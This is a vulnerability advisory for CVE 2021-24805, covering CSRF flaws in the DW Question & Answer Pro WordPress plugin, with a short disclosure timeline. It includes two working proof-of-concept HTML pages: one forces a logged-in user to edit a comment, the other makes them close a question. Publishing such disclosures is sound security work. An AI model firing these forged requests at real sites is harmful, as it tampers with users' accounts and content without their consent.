DW Question & Answer Pro < 1.3.7 – Multiple CSRF | CVE 2021-24805

Description

The plugin does not properly check for CSRF in some of its functions, allowing attackers to make logged in users perform unwanted actions, such as update a comment or a question status.

Vendor was notified via Envato on September 28th, 2021, but did not properly fix the issue and was notified numerous times since.

Proof of Concept

CSRF to update_comment
<html>
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "https:\/\/example.com\/question\/adsads-2\/?comment_edit=17", true);
        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------178253989038940920481555404700");
        xhr.withCredentials = true;
        var body = "-----------------------------178253989038940920481555404700\r\n" + 
          "Content-Disposition: form-data; name=\"comment_content\"\r\n" + 
          "\r\n" + 
          "TESTCSRF\r\n" + 
          "-----------------------------178253989038940920481555404700\r\n" + 
          "Content-Disposition: form-data; name=\"dwqa_upload[]\"; filename=\"\"\r\n" + 
          "Content-Type: application/octet-stream\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------178253989038940920481555404700\r\n" + 
          "Content-Disposition: form-data; name=\"dwqa-mention-submit-form\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------178253989038940920481555404700\r\n" + 
          "Content-Disposition: form-data; name=\"dwqa-mention-submit-form-highlight\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------178253989038940920481555404700\r\n" + 
          "Content-Disposition: form-data; name=\"comment_id\"\r\n" + 
          "\r\n" + 
          "17\r\n" + 
          "-----------------------------178253989038940920481555404700\r\n" + 
          "Content-Disposition: form-data; name=\"dwqa-edit-comment-submit\"\r\n" + 
          "\r\n" + 
          "Save Changes\r\n" + 
          "-----------------------------178253989038940920481555404700--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>

CSRF to update a question status
<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="dwqa-update-question-status" />
      <input type="hidden" name="question" value="79" />
      <input type="hidden" name="status" value="closed" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>